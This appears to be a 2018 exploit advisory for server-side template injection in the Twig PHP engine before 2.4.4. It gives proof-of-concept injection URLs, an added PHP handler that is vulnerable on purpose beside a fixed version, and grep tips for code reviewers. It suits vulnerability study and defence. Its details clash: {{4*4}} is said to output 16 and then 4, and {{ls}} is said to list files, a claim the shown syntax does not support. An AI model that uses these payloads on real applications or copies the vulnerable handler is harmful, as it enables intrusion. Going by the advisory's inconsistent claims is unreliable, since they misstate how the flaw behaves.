Twig Server Side Template Injection

2018.02.17
Credit: JameelNabbo
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Vulnerability details:

# Exploit Title: Twig <2.4.4 Server side template injection
# Date: 02/15/2018
# Exploit Author: JameelNabbo
# Author website: www.jameelnabbo.com
# Vendor Homepage: https://twig.symfony.com
# Software Link: https://twig.symfony.com/doc/2.x/intro.html#installation
# Version: < 2.4.4
# Tested on: MAC OSX

1. Description:
Twig is a modern PHP template engine which compiles templates down to plain optimized PHP code. Twig <2.4.4 contains an SSTI vulnerability which allows attackers to execute commands within the parameters by supplying {{COMMAND TO EXECUTE}} instead of the expected value (a normal integer or a normal string), depending on the vulnerable application, which takes different params by GET or POST.

Example: by injecting this in a search param
http://localhost/search?search_key={{4*4}}
Output: 16

2. POC:
http://localhost/search?search_key={{4*4}}
OUTPUT: 4
http://localhost/search?search_key={{ls}}
OUTPUT: list of files/directories etc.
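The root cause described above is the application letting the request parameter become part of the template source. The following is an added example, not code from the advisory or from the Twig project: a search handler in Twig 2.x written the vulnerable way beside the corrected way. It assumes Twig is installed via Composer (vendor/autoload.php); the function names and the sample search value are constructed for illustration.

```php
<?php
// Added example (not from the advisory): the same search parameter handled two ways.
// Assumes Twig 2.x installed through Composer.
require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Loader\ArrayLoader;

// Constructed sample value: the harmless probe the advisory uses.
$searchKey = $_GET['search_key'] ?? '{{4*4}}';

// VULNERABLE (hypothetical handler): the request value is concatenated into the
// template *source*, so Twig parses and evaluates whatever sits inside {{ ... }}.
function renderVulnerable(Environment $twig, string $input): string
{
    $template = $twig->createTemplate('Results for: ' . $input);
    return $template->render([]);
}

// FIXED (hypothetical handler): the template source is a constant string and the
// request value is passed in as a variable, so it is treated as data, auto-escaped
// and printed verbatim; no Twig expression in it is ever evaluated.
function renderSafe(Environment $twig, string $input): string
{
    $template = $twig->createTemplate('Results for: {{ search_key }}');
    return $template->render(['search_key' => $input]);
}

$twig = new Environment(new ArrayLoader([]));

echo renderVulnerable($twig, $searchKey), PHP_EOL;
echo renderSafe($twig, $searchKey), PHP_EOL;
```

Defenders reviewing code for this bug should grep for createTemplate(), render() on a string built from request data, or a loader fed user-controlled template text; the fix is always to keep template source static and pass input as context variables.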


Copyright 2018, cxsecurity.com
